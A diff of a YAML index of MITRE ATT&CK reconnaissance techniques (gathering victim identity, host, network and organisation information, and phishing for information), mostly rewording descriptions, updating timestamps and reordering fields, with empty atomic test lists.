-51842,29 +54958,14 @@ reconnaissance: url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Email Addresses - description: |- - Before compromising a victim, adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. - - Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). - id: attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: reconnaissance - modified: '2020-10-24T03:46:04.662Z' - created: '2020-10-02T14:56:24.866Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1589.003: technique: @@ -51881,7 +54982,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Employee Names description: |- - Before compromising a victim, adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures. + Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures. Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156 @@ -51889,7 +54990,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:46:29.173Z' + modified: '2021-04-15T03:27:49.437Z' created: '2020-10-02T14:57:15.906Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51915,7 +55016,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Firmware description: |- - Before compromising a victim, adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.). + Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.). Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). id: attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d @@ -51923,7 +55024,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:52:36.854Z' + modified: '2021-04-15T03:22:46.759Z' created: '2020-10-02T16:46:42.537Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51949,7 +55050,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Gather Victim Host Information description: |- - Before compromising a victim, adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). + Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f @@ -51957,7 +55058,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:53:39.351Z' + modified: '2021-04-15T03:23:58.024Z' created: '2020-10-02T16:39:33.966Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -51970,6 +55071,21 @@ reconnaissance: atomic_tests: [] T1589: technique: + created: '2020-10-02T14:54:59.263Z' + modified: '2021-04-15T03:27:49.579Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + type: attack-pattern + id: attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4 + name: Gather Victim Identity Information + description: |- + Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1589 @@ -52009,32 +55125,32 @@ reconnaissance: url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - description: |- - Before compromising a victim, adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. - - Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). - name: Gather Victim Identity Information - id: attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: reconnaissance - modified: '2020-10-27T02:27:31.387Z' - created: '2020-10-02T14:54:59.263Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - PRE atomic_tests: [] T1590: technique: + created: '2020-10-02T15:45:17.628Z' + modified: '2021-04-15T03:34:23.229Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + type: attack-pattern + id: attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109 + description: |- + Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + name: Gather Victim Network Information + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1590 @@ -52049,29 +55165,14 @@ reconnaissance: url: https://www.circl.lu/services/passive-dns/ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Gather Victim Network Information - description: |- - Before compromising a victim, adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. - - Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). - id: attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: reconnaissance - modified: '2020-10-25T22:58:23.086Z' - created: '2020-10-02T15:45:17.628Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - PRE atomic_tests: [] T1591: technique: @@ -52092,7 +55193,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Gather Victim Org Information description: |- - Before compromising a victim, adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. + Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23 @@ -52100,7 +55201,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:10:36.479Z' + modified: '2021-04-15T03:39:09.021Z' created: '2020-10-02T16:27:02.339Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52126,7 +55227,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Hardware description: |- - Before compromising a victim, adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.). + Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.). Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)). id: attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26 @@ -52134,7 +55235,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:53:03.353Z' + modified: '2021-04-15T03:23:21.031Z' created: '2020-10-02T16:40:47.488Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52166,7 +55267,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: IP Addresses description: |- - Before compromising a victim, adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted. + Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3 @@ -52174,7 +55275,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:03:29.213Z' + modified: '2021-04-15T03:31:05.302Z' created: '2020-10-02T15:59:11.695Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52200,7 +55301,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Identify Business Tempo description: |- - Before compromising a victim, adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources. + Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)) id: attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f @@ -52208,7 +55309,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:10:12.352Z' + modified: '2021-04-15T03:38:31.983Z' created: '2020-10-02T16:34:32.435Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52234,7 +55335,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Identify Roles description: |- - Before compromising a victim, adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to. + Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). id: attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4 @@ -52242,7 +55343,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:10:36.279Z' + modified: '2021-04-15T03:39:08.904Z' created: '2020-10-02T16:37:30.015Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52268,7 +55369,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Security Appliances description: |- - Before compromising a victim, adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations. + Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413 @@ -52276,7 +55377,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:04:13.578Z' + modified: '2021-04-15T03:31:54.275Z' created: '2020-10-02T16:01:35.350Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52301,7 +55402,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Topology description: |- - Before compromising a victim, adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. + Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5 @@ -52309,7 +55410,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:04:40.188Z' + modified: '2021-04-15T03:33:02.476Z' created: '2020-10-02T15:49:03.815Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52335,7 +55436,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Trust Dependencies description: |- - Before compromising a victim, adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. + Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e @@ -52343,7 +55444,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:05:03.816Z' + modified: '2021-04-15T03:34:22.917Z' created: '2020-10-02T15:47:59.457Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52394,7 +55495,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Phishing for Information description: |- - Before compromising a victim, adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. + Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns. @@ -52404,22 +55505,23 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-25T19:44:58.292Z' + modified: '2021-04-15T03:43:13.134Z' created: '2020-10-02T17:07:01.502Z' x_mitre_contributors: + - Philip Winther - Sebastian Salla, McAfee - Robert Simmons, @MalwareUtkonos x_mitre_data_sources: - - Social media monitoring - - Mail server - - Email 